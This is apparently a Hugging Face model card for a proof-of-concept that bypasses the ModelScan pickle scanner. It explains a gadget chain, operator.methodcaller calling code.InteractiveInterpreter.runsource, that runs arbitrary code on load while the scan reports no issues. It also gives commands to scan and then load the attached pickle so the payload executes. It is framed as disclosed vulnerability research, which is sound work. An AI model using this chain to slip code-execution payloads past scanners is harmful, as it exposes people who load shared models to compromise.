| --- |
| tags: |
| - modelscan |
| - picklescan |
| - bypass |
| - rce |
| - proof-of-concept |
| library_name: generic |
| --- |
| |
| # ModelScan Bypass PoC: `code.InteractiveInterpreter.runsource()` + `operator.methodcaller()` |
|
|
| ## Overview |
|
|
| This is a proof-of-concept demonstrating a **new bypass** of ProtectAI ModelScan (v0.8.x), |
| the model scanner used by HuggingFace to detect malicious pickle models. |
|
|
| ## Bypass Mechanism |
|
|
| ModelScan blocks pickle `GLOBAL` opcodes for known dangerous modules (os, subprocess, pickle, builtins.eval, etc.) |
| but fails to block `code.InteractiveInterpreter` and `operator.methodcaller`. |
|
|
| The exploit chain: |
| ```python |
| operator.methodcaller("runsource", PAYLOAD)(code.InteractiveInterpreter()) |
| = code.InteractiveInterpreter().runsource(PAYLOAD) |
| = compile(PAYLOAD) + exec(PAYLOAD) |
| ``` |
|
|
| ## Files |
|
|
| | File | Format | Description | |
| |------|--------|-------------| |
| | `code_bypass.pkl` | Pickle (v5) | Raw pickle file, 171 bytes | |
| | `code_bypass.joblib` | joblib | .joblib format, 298 bytes | |
|
|
| ## Verification |
|
|
| ```bash |
| # Install modelscan |
| pip install modelscan |
| |
| # Scan - will report "No issues found" |
| modelscan --path code_bypass.pkl |
| |
| # Execute - will run the payload |
| python -c "import pickle; pickle.load(open('code_bypass.pkl','rb'))" |
| ``` |
|
|
| ## Disclosure |
|
|
| - **Researcher:** xiaoyaoes |
| - **Date:** 2026-06-18 |
| - **Status:** Reported via Huntr MFV program |
|
|